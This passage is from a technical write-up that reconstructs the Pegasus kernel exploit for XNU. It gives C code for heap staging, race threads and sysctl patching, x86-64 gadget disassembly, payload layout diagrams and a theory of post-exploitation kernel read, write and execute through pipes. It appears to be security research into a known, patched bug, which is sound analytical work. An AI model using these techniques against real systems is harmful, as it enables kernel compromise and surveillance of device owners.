With the kext loaded, we can try showobject again:

(lldb) showobject 0xFFFFFF8014A99800
`object 0xffffff8014a99800, vt 0xffffff7f8f211f20 <vtable for IOHDIXControllerUserClient>, retain count 6, container retain 0`

The registry_entry object (and the leaked pointer) turns out to be an IOHDIXControllerUserClient object. This makes sense because that’s the IOService we’re querying in our exploit code:

serv=IOServiceGetMatchingService(master,IOServiceMatching("IOHDIXController"));

If this pointer predicts the location of our payload, it must come from the same allocation zone. What zone does it come from? It turns out IOHDIXControllerUserClient is quite large:

(lldb) call sizeof(IOHDIXControllerUserClient)
(unsigned long) $431 = 528

It’s 528 bytes, which is too large for kalloc.512, the largest kalloc zone smaller than kalloc.1024 (where our 800+ byte payload gets allocated). That means IOHDIXControllerUserClient objects likely come from kalloc.1024 as well, the same zone as the payload.
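The zone reasoning can be checked with a deliberately simplified model. The function below is hypothetical and assumes only power-of-two kalloc zones from 16 bytes upward. The real zone list contains additional sizes, so this only illustrates why a 528-byte object and an 812-byte buffer would share a zone while a 32-byte object would not.

```c
#include <assert.h>
#include <stddef.h>

/* Simplified model: round an allocation size up to the next power-of-two
 * zone, starting at 16 bytes. Not the real kalloc zone table. */
size_t kalloc_zone_pow2(size_t size)
{
    size_t zone = 16;

    assert(size > 0);
    while (zone < size)
        zone <<= 1;
    return zone;
}
```

In this model kalloc_zone_pow2(528) and kalloc_zone_pow2(812) both land in the 1024-byte zone, whereas the 32-byte first stage payload stays in the 32-byte zone alongside freed OSString objects.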

After triggering the leak, it’s important to clean up the IOKit connection:

if(object)
{
	IOObjectRelease(object);
}
if(iter)
{
	IOObjectRelease(iter);
}
if(conn)
{
	IOServiceClose(conn);
}

Doing so causes the UserClient object to be released and added back to the kalloc.1024 freelist. If we’re fast enough calling open_extended(), that same chunk of memory will get reallocated for the kauth_filesec struct and our payload.

Surprisingly this appears unrelated to the long, peculiar property name used by Pegasus, which remains unexplained.

Improving reliability of payload staging

The zone our payload gets allocated in, kalloc.1024, is a busy one. Even with the oracle predicting our payload address, it’s quite likely that the predicted address will get allocated for something else and the payload won’t land where we expect.

There are a couple of things that can help. First, we can start a bunch of threads all trying to open_extended() the lockfile at once:

static void *openx_loop(void *unused)
{
	int fdx;
	uid_t owner=getuid();
	gid_t group=getgid();
	int flags=O_RDWR|O_EXLOCK;
	int mode=S_IRWXU|S_IRWXG|S_IRWXO;

	while(!fsacl_g)
	{
		continue;
	}

	fdx=open_extended(openx_path_g,flags,owner,group,mode,(struct kauth_filesec *)fsacl_g);

	if(fdx<0)
	{
		perror("open_extended");
		log_err("open_extended() should have blocked.\n");
		return NULL;
	}
	log_err("open_extended() should have blocked but returned: %d\n",fdx);
	close(fdx);
	return NULL;
}

int create_openx_threads(size_t threadcount,pthread_t *threadlist)
{
	size_t i; /* matches the type of threadcount */
	pthread_t busy_thread;
	for(i=0;i<threadcount;i++)
	{
		if(pthread_create(&busy_thread,NULL,openx_loop,NULL)!=0)
		{
			perror("pthread_create");
			log_err("Failed to create thread and stage payload.\n");
			exit(EXIT_FAILURE);
		}
		threadlist[i]=busy_thread;

	}
	return 0;
}

This improves the likelihood that at least one of the attempts to block on opening the lockfile will stage the payload in the right place.

Second, we can create a set of threads that each spin in a CPU-intensive busy loop, slowing the whole system down and making it easier to win the race. Be mindful not to:

Make the busy loop easy for the compiler to optimize away
Trigger context switches, such as via system calls
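A minimal sketch of such a spinner follows. The names spin_stop_g, spin_loop(), and create_spin_threads() are hypothetical and not taken from the original exploit code. The loop reads and writes a volatile local so the compiler has to keep the work, and it makes no system calls.

```c
#include <pthread.h>
#include <stdatomic.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stop flag: store 1 to let the spinners exit. */
static atomic_int spin_stop_g;

/* Burn CPU without making system calls. The volatile local forces a real
 * load and store on every iteration, so the loop can't be optimized away. */
static void *spin_loop(void *unused)
{
	volatile uint64_t x = 1;

	(void)unused;
	while (!atomic_load(&spin_stop_g)) {
		x = x * 6364136223846793005ULL + 1442695040888963407ULL;
	}
	return NULL;
}

/* Start `count` spinner threads; returns 0 on success, -1 on failure. */
static int create_spin_threads(size_t count, pthread_t *threads)
{
	size_t i;

	for (i = 0; i < count; i++) {
		if (pthread_create(&threads[i], NULL, spin_loop, NULL) != 0)
			return -1;
	}
	return 0;
}
```

Once the race has been won (or abandoned), setting spin_stop_g to 1 and joining the threads returns the system to normal load.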

Use-After-Free Dictionary and Payload Construction

Note: This section gets deep into the process of describing gadgets in the kernel and how they can be chained together to do what we need. Obviously, most of the gadgets here would be different or unavailable on an arm64 target. The goal here is not to precisely reconstruct Pegasus’s gadget chain, but rather to work through the challenge of building a chain that accomplishes the same thing, and to understand how gadgets can be combined in powerful ways.

With the second payload staged in memory, we must construct the corrupt dictionary containing the first stage payload.

For the discussion below, refer to the source fragment above from the use-after-free site (see Payload Anatomy) as well as the hypothetical OSString struct described above (see How OSString Works).

Below is x86-64 disassembly of the use-after-free site:

mov     [rbp+var_5C], edx
mov     eax, ebx
mov     rbx, [rdi+rax*8];
mov     rax, [rbx]          ;rax = o->vtable
mov     rdi, rbx            ;rdi = o
call    qword ptr [rax+20h] ; call [vtable +0x20]
							; UaF here: o->release()

Above, the object is dereferenced and its vtable pointer is loaded into rax. Since we control the 32-byte object structure, we can determine the “vtable” that it points to. This ends up being some offset relative to the second payload staged previously. Then the object pointer itself is loaded into rdi. Finally, the “vtable” is dereferenced and a function pointer (or arbitrary .text address) at offset 0x20 is called.

Referencing the corrupt dictionary from above, the 32-byte <data> object starts to take shape:

<data>[payload2-0x20|  8-15  | 16-23 | 24-31  ]</data>
           ^
           |
           +------The payload2 pointer is interpreted as the vtable address.
                  We need to adjust it by -0x20 to account for the `rax+0x20`.

The address at 0x20 into the vtable ends up being the first gadget that gets called. That gadget will still have a handle on this object pointer which was loaded into rdi.

First Gadget

The Lookout paper was particularly vague on the gadget chain executed by the use-after-free. The only specific gadget that it calls out is OSSerializer::serialize( OSSerialize * s ):

__int64 __fastcall OSSerializer::serialize(OSSerializer *__hidden this, OSSerialize *)
push    rbp
mov     rbp, rsp
mov     rdx, rsi
mov     rax, [rdi+20h]
mov     rcx, [rdi+10h]
mov     rsi, [rdi+18h]
mov     rdi, rcx
pop     rbp
jmp     rax

This is an unusually useful gadget (also a rare instance of one that works the same on both architectures) for setting up and dispatching other gadgets. It has the following unique properties:

Calls an attacker-specified function (or arbitrary .text address)
First two function arguments are attacker-provided (rdi and rsi)
Stack neutral (jmp rather than call, and push/pop are balanced)
Potentially maintains a pointer to attacker’s buffer in rcx

Further, two successive passes through this gadget can be chained to stage a third function argument in rdx (the canonical third argument register on x86-64). Note that at the start of the gadget, rsi is saved to rdx. A three-argument function call simply requires:

A first pass that puts argument three in rsi
A second pass that moves that third argument to rdx, and…
Stages arguments one and two into rdi and rsi respectively.

This is exceptionally useful for calling functions requiring three parameters such as copyout() and copyin().
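The two-pass trick can be modeled in userspace. The sketch below mirrors the gadget's loads with a hypothetical regs struct and treats rdi as a host pointer rather than a kernel address. It also assumes the first pass jumps straight back into the gadget itself; serialize_addr and target are stand-in values, not real kernel symbols.

```c
#include <stdint.h>

/* Hypothetical model of the registers the gadget touches. */
struct regs {
	uint64_t rax, rcx, rdx, rdi, rsi;
};

/* Mirror the gadget's loads. rdi is treated as a host pointer to 8-byte
 * slots, so [rdi+10h] is slot 2, [rdi+18h] slot 3, and [rdi+20h] slot 4. */
static void serialize_gadget(struct regs *r)
{
	const uint64_t *buf = (const uint64_t *)(uintptr_t)r->rdi;

	r->rdx = r->rsi;   /* mov rdx, rsi       */
	r->rax = buf[4];   /* mov rax, [rdi+20h] */
	r->rcx = buf[2];   /* mov rcx, [rdi+10h] */
	r->rsi = buf[3];   /* mov rsi, [rdi+18h] */
	r->rdi = r->rcx;   /* mov rdi, rcx       */
	/* jmp rax: the caller decides what "jumping" to r->rax means. */
}

/* Lay out two frames so that two passes stage target(arg1, arg2, arg3). */
static void stage_three_arg_call(uint64_t frame1[5], uint64_t frame2[5],
                                 uint64_t serialize_addr, uint64_t target,
                                 uint64_t arg1, uint64_t arg2, uint64_t arg3)
{
	frame1[2] = (uint64_t)(uintptr_t)frame2; /* pass 1: rdi -> frame2    */
	frame1[3] = arg3;                        /* pass 1: rsi = arg3       */
	frame1[4] = serialize_addr;              /* pass 1: re-enter gadget  */
	frame2[2] = arg1;                        /* pass 2: rdi = arg1       */
	frame2[3] = arg2;                        /* pass 2: rsi = arg2       */
	frame2[4] = target;                      /* pass 2: jump to target   */
}
```

After the second pass through serialize_gadget(), rdi, rsi, and rdx hold the three arguments and rax holds the target, which is the register state a three-argument call such as copyout() expects.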

It is unlikely, however, that this is the actual first gadget in the chain. Recall the OSString object (pointed to by rdi) is 32 bytes on 64-bit architectures. But the gadget above loads rax from rdi+32, which means reading bytes 32 through 39, just past the end of the attacker’s first payload. Recall that we can’t make the first payload larger than 32 bytes, due to allocation zones. The only way to use this gadget is to jump first into another gadget that adjusts rdi, either by reducing it by eight bytes or by making it point into our second payload.

An ideal gadget for this is _IOOpenServiceIterator::isValid():

__int64 __fastcall _IOOpenServiceIterator::isValid(_IOOpenServiceIterator *__hidden this)
push    rbp
mov     rbp, rsp
mov     rdi, [rdi+10h]; rdi no longer points to payload1, and now points into payload2.
mov     rax, [rdi]
pop     rbp
jmp     qword ptr [rax+120h]

Above, we grab a pointer from rdi+16 and load it into rdi. Then, from the new rdi we load a pointer into rax. From there we jump to whatever address is pointed to by rax+0x120.

This gadget has the following useful properties:

Stack neutral
Pivots rdi to point into the attacker’s larger buffer
Jumps into an attacker-specified function or other executable location

Pivoting rdi to point into our second payload sets up the OSSerializer::serialize() gadget.

Our 32-byte buffer comes into clearer focus:

payload1---------------+
                       |
      /----------------+--------------------\
      |                                     |
<data>[payload2-0x20|  8-15  |payload2+8| 24-31  ]</data>
           ^
           |                    ^
           |                    |
           |                    +----1st gadget loads payload2's 2nd pointer into rdi
           |
           +------The payload2 pointer is interpreted as the vtable address at o->release().
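The layout in the diagram can be written out as a small helper. This is a sketch under stated assumptions: build_payload1() is a hypothetical name, payload2_addr stands for the address predicted by the oracle, and the two slots the diagram leaves unlabeled are simply zeroed here.

```c
#include <stdint.h>
#include <string.h>

#define PAYLOAD1_SIZE 32

/* Hypothetical helper: fill the 32-byte <data> object.
 * payload2_addr is the predicted kernel address of the second payload. */
static void build_payload1(uint8_t out[PAYLOAD1_SIZE], uint64_t payload2_addr)
{
	uint64_t slots[PAYLOAD1_SIZE / sizeof(uint64_t)] = { 0 };

	/* o->release() calls [vtable+0x20], so bias the fake vtable by -0x20
	 * to make that load hit the first slot of payload2. */
	slots[0] = payload2_addr - 0x20;

	/* The first gadget loads rdi from [rdi+10h]; point it at payload2's
	 * second slot. */
	slots[2] = payload2_addr + 8;

	/* Slots 1 and 3 (bytes 8-15 and 24-31) stay zeroed in this sketch;
	 * the diagram does not assign them a value. */
	memcpy(out, slots, PAYLOAD1_SIZE);
}
```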

Gadget Chaining with the Stage-2 Payload

By the time we finally jump into the OSSerializer::serialize() dispatch gadget, we’ve referenced the second stage payload three times. The layout for that payload that is taking shape is:

Payload 2:
      +---called by o->release()
      |   (_IOOpenServiceIterator::isValid)
      |
      |                  +--loaded into rax by gadget1
      |                  |  The *address of this* is loaded
      |                  |  into rdi
      |                  |                  +--jumped to by gadget1 via:
      |                  |                  |  jmp     qword ptr [rax+120h]
      |                  |                  |
      v                  v                  v
[gadget1 address | payload2-0x120+16 | OSS::serialize |    ...    |   ....               ]
[      0-7       |       8-15        |     16-23      |   24-31   |   32-800+            ]
                         |                 ^
                         |                 |
                         +---points here---+
                           (after +0x120)

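At the first jump into the OSSerializer::serialize gadget, rdi points to payload2+8, the value the first gadget loaded from payload1. serialize then proceeds to dereference rdi+0x10, rdi+0x18, and rdi+0x20 (that is, payload2+0x18, payload2+0x20, and payload2+0x28) for rdi, rsi, and rax (the next gadget) respectively.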

As long as any of the next gadgets can ensure rdi points to some offset into payload2, it can jump into OSSerializer::serialize and repeat the process again. We can repeat this process as many times as necessary, giving us effectively arbitrary kernel execution.
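The pointer arithmetic in the payload 2 diagram is easy to get wrong, so it can help to trace it in userspace. The sketch below fills the first three slots as drawn and replays the first gadget's loads against them. All names are hypothetical, and the addresses are placeholders the caller supplies.

```c
#include <stdint.h>

/* Hypothetical helper: fill the first three 8-byte slots of payload2. */
static void build_payload2_header(uint64_t *p2, uint64_t payload2_addr,
                                  uint64_t gadget1_addr, uint64_t serialize_addr)
{
	p2[0] = gadget1_addr;               /* reached via call [rax+20h]        */
	p2[1] = payload2_addr - 0x120 + 16; /* rax for gadget1; +0x120 -> slot 2 */
	p2[2] = serialize_addr;             /* target of jmp [rax+120h]          */
}

/* Read the 8-byte slot that a simulated kernel address refers to. */
static uint64_t load64(const uint64_t *p2, uint64_t payload2_addr, uint64_t addr)
{
	return p2[(addr - payload2_addr) / 8];
}

/* Trace gadget1 starting from payload1's third slot (payload2+8).
 * Returns the jump target and stores the pivoted rdi in *rdi_out. */
static uint64_t trace_gadget1(const uint64_t *p2, uint64_t payload2_addr,
                              uint64_t *rdi_out)
{
	uint64_t rdi = payload2_addr + 8;               /* mov rdi, [rdi+10h] */
	uint64_t rax = load64(p2, payload2_addr, rdi);  /* mov rax, [rdi]     */

	*rdi_out = rdi;
	return load64(p2, payload2_addr, rax + 0x120);  /* jmp [rax+120h]     */
}
```

Traced this way, the jump lands on the slot holding the OSSerializer::serialize address with rdi left at payload2+8, so the dispatcher's loads at +0x10, +0x18, and +0x20 fall on payload2+0x18, payload2+0x20, and payload2+0x28.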

Continuation of Execution

One of the ways exploiting Aleph One-style stack-smashing bugs was straightforward was that continuation of execution wasn’t required. That is to say, it usually wasn’t necessary for the exploited process to continue executing and remain stable. The various structures in the target process’s memory could be completely wrecked by the exploit. Generally exploitation ended in a system call to execve() which would replace the process image with a shell or some other process. From there, if necessary, the vulnerable process could simply be restarted.

When exploiting kernel bugs, this is not the case. Wrecking the target’s address space would result in a panic, and is clearly undesirable.

Having successfully triggered an attacker-controlled chain of execution and gracefully returned to the call site, we have yet another challenge. We’re still left with a blob of corrupt, arbitrary data being interpreted as an OSString. We need to clean that up somehow.

The easiest way to handle this, after returning, is to use an error condition that causes the function to bail as quickly as possible.

After the unserialization switch, there is such a check:

//File: xnu-3248.30.4/libkern/c++/OSSerializeBinary.cpp
switch (kOSSerializeTypeMask & key)
{


    case kOSSerializeObject:
        if (len >= objsIdx) break;
        o = objsArray[len];
        o->retain();
        isRef = true;
        break;


}

if (!(ok = (o != 0))) break;

If o is NULL, the loop breaks, and the function quickly returns without further reference to the corrupt object.

Let’s look at the disassembly:

mov     [rbp+var_5C], edx
mov     eax, ebx
mov     rbx, [rdi+rax*8] ; o=objsArray[len];
						; rbx<-o
mov     rax, [rbx]
mov     rdi, rbx
call    qword ptr [rax+20h] ; UaF here: o->release()
...
jmp     loc_FFFFFF8000835

Then shortly thereafter, we see a check of whether rbx is NULL:

loc_FFFFFF8000835604:
test    rbx, rbx
setnz   r12b
mov     r13, [rbp+var_40]
mov     rdi, [rbp+var_80]
jz      loc_FFFFFF8000835B0D

So, somehow our gadget chain needs to ensure rbx gets zeroed out before returning to the caller. Here is a sequence of gadgets that does just that. Recall that each gadget jumps or returns back into the dispatcher. The dispatcher stages rdi and rsi before jumping to the next gadget.

Push the address of the chain’s intended kernel function. A future gadget will ret to it:

push    rsi <--contains address of desired kernel function (e.g., `copyout()`)
jmp     QWORD PTR [rcx] <--attacker-controlled address loaded by OSSerializer::serialize()

Push rbp to the stack to balance a future pop rbp:

push    rbp <--prepare for pop rbp
and     al,0xfd
jmp     QWORD PTR [rsi-0x7b]

Push NULL to the stack to be later popped into rbx:

push    rsi <--contains 0 for rbx
jmp     QWORD PTR [rcx]

Pop NULL into rbx, restore rbp, then return into the target function which, in turn, will return gracefully back to OSUnserializeBinary():

pop     rbx
pop     rbp
ret

Shortly after the return, rbx is found to be 0 and the function quickly bails.
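To check that the pushes and pops balance, the sequence can be replayed against a toy stack. This is a hypothetical model, not kernel code: the stack here is an array that grows upward, and only rbx, rbp, and the return target are tracked.

```c
#include <stdint.h>

/* Hypothetical, tiny model of the state the four gadgets touch. */
struct cpu {
	uint64_t rbx, rbp, rip;
	uint64_t stack[8];
	int sp;               /* number of values currently on the stack */
};

static void push(struct cpu *c, uint64_t v) { c->stack[c->sp++] = v; }
static uint64_t pop(struct cpu *c)          { return c->stack[--c->sp]; }

/* Replay the chain: target is the kernel function to return into. */
static void run_cleanup_chain(struct cpu *c, uint64_t target)
{
	push(c, target);   /* gadget 1: push rsi (rsi = target function) */
	push(c, c->rbp);   /* gadget 2: push rbp                          */
	push(c, 0);        /* gadget 3: push rsi (rsi = 0)                */
	c->rbx = pop(c);   /* gadget 4: pop rbx  -> rbx = 0               */
	c->rbp = pop(c);   /*           pop rbp  -> rbp restored          */
	c->rip = pop(c);   /*           ret      -> jump to target        */
}
```

The model ends with an empty stack, rbx cleared, rbp unchanged, and control in the target function, which matches the state the NULL check in OSUnserializeBinary() needs.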

Post-Exploitation: Gaining Reusable Read, Write, and Execute

Note: The following description of post-exploitation is mostly a suggested theory of operation and is not a fact-for-fact description of Pegasus’s actual behavior. It is based on a combination of abstract description in the Lookout paper and independent research for this project.

According to the Lookout paper, the goal for the kernel exploit was to patch the kernel in such a way that userspace could read from and write to arbitrary kernel memory, and could call arbitrary kernel functions (or other executable kernel code) without having to re-exploit and risk destabilizing the system.

The paper isn’t particularly explicit with respect to how this mechanism works, other than to say on 32-bit systems, two different clock handlers are overwritten. It also goes on to say that a pipe set (see pipe(2) manpage) is used as a conduit with which to read and write kernel data, and to stage shellcode to be executed.

On 64-bit systems, Lookout is even more vague. It only says that the mechanism is simpler: a sysctl handler is overwritten, rather than the two clock handlers. It also suggests that the pipe is used in a “similar” way. It is left as an exercise for the reader to imagine how this mechanism works.

Pipes: A Way To Converse with the Kernel

It would be worthwhile for the reader to spend time studying how pipes work in the kernel. Briefly, here are some salient points:

A pipe has a pair of file descriptors (one for each “end” of the pipe)
The file descriptors each have an inode
Since the pipe doesn’t really exist on the filesystem, the inode turns out to be the obfuscated address of one of the pipe’s data structures in kernel memory
A pipe struct in the kernel contains a nested structure that points to the read or write buffer for that file descriptor

Here’s relevant kernel code.

Pipe struct:

//File: xnu-3248.30.4/bsd/sys/pipe.h

/*
 * Per-pipe data structure.
 * Two of these are linked together to produce bi-directional pipes.
 */
struct pipe {
   struct  pipebuf pipe_buffer;    /* data storage */

};

A pipe’s backing storage:

//File: xnu-3248.30.4/bsd/sys/pipe.h
/*
 * Pipe buffer information.
 * Separate in, out, cnt are used to simplify calculations.
 * Buffered write is active when the buffer.cnt field is set.
 */
struct pipebuf {

   caddr_t buffer;     /* kva of buffer */
};

Statting a pipe file descriptor:

//File: xnu-3248.30.4/bsd/kern/sys_pipe.c
if (isstat64 != 0) {

    /*
    * Return a relatively unique inode number based on the current
    * address of this pipe's struct pipe.  This number may be recycled
    * relatively quickly.
    */
    sb64->st_ino = (ino64_t)VM_KERNEL_ADDRPERM((uintptr_t)cpipe);

What all this means is that, at least in theory, userspace can use the pipe’s pair of descriptors as a sort of dead-drop between itself and the compromised kernel. One descriptor is for sending data to the kernel; the other for retrieving data.

In theory, we could write a few things to the pipe:

Address of a function we want to have executed
Arguments to that function

Then, after triggering the kernel’s execution of the function or gadget (which we’ll get to next), we can read the result from the other end of the pipe.

The attacker, of course, needs to leak the permutation value used to obfuscate the pipe’s address, but as we saw above, the use-after-free makes that straightforward.
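From userspace, the obfuscated address is just the st_ino field returned by fstat(). The sketch below reads it and undoes the obfuscation. It assumes the obfuscation is additive (my reading of VM_KERNEL_ADDRPERM in this XNU version) and that the permutation value has already been leaked. pipe_inode() and deobfuscate_pipe_addr() are hypothetical names.

```c
#include <stdint.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create a pipe and return the inode number reported for its read end.
 * Returns 0 on success, -1 on failure. fds[] receives both descriptors. */
static int pipe_inode(int fds[2], uint64_t *ino_out)
{
	struct stat st;

	if (pipe(fds) != 0)
		return -1;
	if (fstat(fds[0], &st) != 0) {
		close(fds[0]);
		close(fds[1]);
		return -1;
	}
	*ino_out = (uint64_t)st.st_ino;
	return 0;
}

/* Assumption: the obfuscation is additive, so subtracting the leaked
 * permutation value recovers the address of the struct pipe. */
static uint64_t deobfuscate_pipe_addr(uint64_t ino, uint64_t addrperm)
{
	return ino - addrperm;
}
```

On systems other than the XNU target discussed here, st_ino for a pipe is an ordinary inode number and the subtraction is meaningless.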

sysctl: A Generic Interface to Call Arbitrary Kernel Functions

The less straightforward part is how to patch the sysctl handler in such a way that it can be made to trigger execution of an arbitrary function with arbitrary arguments.

The Lookout paper says the net.inet.ip.dummynet.extract_heap “sysctl handler is overwritten,” but doesn’t elaborate further. Presumably this is a rarely or never used sysctl OID on iOS. Let’s look at a sysctl structure:

//File: xnu-3248.30.4/bsd/sys/sysctl.h
struct sysctl_oid {
   struct sysctl_oid_list *oid_parent;
   SLIST_ENTRY(sysctl_oid) oid_link;
   int     oid_number;
   int     oid_kind;
   void        *oid_arg1;
   int     oid_arg2;
   const char  *oid_name;
   int         (*oid_handler) SYSCTL_HANDLER_ARGS;
   const char  *oid_fmt;
   const char  *oid_descr; /* offsetof() field / long description */
   int     oid_version;
   int     oid_refcnt;
};

Above, the oid_handler element is a pointer to the function that gets called when this sysctl is exercised. That function takes four arguments which are:

A pointer to the sysctl_oid struct, itself,
The oid_arg1 element
The oid_arg2 element
A pointer to the sysctl_req structure representing the sysctl request from userspace.

It’s unclear how the sysctl structure is modified. The Lookout paper simply says that the handler is overwritten and that OSSerializer::serialize() is used in a “similar way” to the 32-bit version of the exploit.

One option would be to simply overwrite the oid_handler pointer, but that doesn’t result in the attacker controlling arguments to that function. If the handler is to be replaced with OSSerializer::serialize(), then the first argument (rdi on x86-64) must point to a buffer of attacker-controlled data.

Another option is to overwrite the entire structure in kernel memory, replacing 8-byte values at the offsets parsed by OSSerializer::serialize() with attacker-controlled data. The exploit would have to first dump the sysctl structure from kernel memory, patch it, then copy it back in, requiring two separate triggers of the use-after-free bug. This can be made more stable by staging two contiguous payloads in a single pass using open_extended(): one to call copyout() and dump the structure, the other to call copyin() and replace the sysctl with the patched structure.

Here is an example of patching the structure so that it may be parsed by OSSerializer::serialize():

void patch_sysctl(char *sysctlbuf, uint64_t rdi, uint64_t rsi, uint64_t rax,uint64_t new_handler)
{
	//OSSerializer::serialize() gets a pointer to this struct
	//in rdi. It doesn't parse it as a sysctl_oid struct, so we don't
	//need to either. It gets its new rdi from buf+0x10, rsi from buf+0x18,
	//and rax from buf+0x20 (to which it will jump)
	memcpy(sysctlbuf+0x20,&rax,sizeof(uint64_t));
	memcpy(sysctlbuf+0x18,&rsi,sizeof(uint64_t));
	memcpy(sysctlbuf+0x10,&rdi,sizeof(uint64_t));
	((struct almost_sysctl_oid *)sysctlbuf)->oid_handler=new_handler;
}
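It can help to see which sysctl_oid fields sit at the offsets the gadget reads. The mirror struct below is hypothetical: it assumes an LP64 target and writes SLIST_ENTRY() out as the single next pointer it expands to.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical mirror of struct sysctl_oid for an LP64 target.
 * SLIST_ENTRY() is a single next pointer, written out here as void *. */
struct sysctl_oid_mirror {
	void       *oid_parent;
	void       *oid_link_next;
	int         oid_number;
	int         oid_kind;
	void       *oid_arg1;
	int         oid_arg2;
	const char *oid_name;
	void       *oid_handler;   /* a function pointer in the real struct */
	const char *oid_fmt;
	const char *oid_descr;
	int         oid_version;
	int         oid_refcnt;
};

/* Offsets that OSSerializer::serialize() reads when handed this struct. */
enum {
	OFF_NEW_RDI = 0x10,  /* overlaps oid_number and oid_kind   */
	OFF_NEW_RSI = 0x18,  /* overlaps oid_arg1                  */
	OFF_NEW_RAX = 0x20   /* overlaps oid_arg2 plus its padding */
};
```

Under these assumptions the three memcpy() calls overwrite oid_number, oid_kind, oid_arg1, and oid_arg2, while the handler pointer lives separately at offset 0x30.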

The exploit may then, after deobfuscating the kernel address of the pipe structure, patch the sysctl structure like so:

patch_sysctl((char *)sysctl,pipe_addr,__unused__,first_gadget,oss_serialize_addr);

This replaces the handler with a pointer to OSSerializer::serialize() which will then parse out the address of the pipe struct into rdi and the address of the first gadget into rax (plus an unused, second argument into rsi).

In the proof-of-concept, this strategy works. The only remaining unsolved piece is finding a gadget that dereferences the pipe struct, places pipe->pipe_buffer.buffer into rdi, then jumps back into OSSerializer::serialize() a second time to pull arguments out of the attacker’s buffer and call the attacker’s requested kernel function.

This would allow us to, from userspace:

Write the function address and arguments to the pipe
Call sysctl() for the net.inet.ip.dummynet.extract_heap OID, triggering execution of our function
Read the result from the other end of the pipe

Conclusion and Further Work

This writeup intended to aggregate much of the publicly available but scattered technical details of Pegasus’s kernel exploitation. It also aimed to fill in some gaps left by previous discussions.

Here are a few aspects from the Lookout paper and other write-ups that are hopefully clearer now:

The relationship between smaller and larger attacker-controlled buffers
The mechanics of abusing open_extended() to stage the larger payload
The process and purpose of page-aligning the second payload buffer prior to staging
The oracle leaked using OSNumber, and how it predicts the location of the second stage payload
What specifically the exploit should do during control of execution to facilitate post-exploitation
Gracefully continuing execution after exploitation

While the post-exploitation section proposed a credible theory around how to stably exercise arbitrary kernel code, it stops short of completely describing a generic mechanism. The exercise of implementing a framework to do this may be worthwhile for the reader. There are likely interesting challenges lying in wait even for this final piece.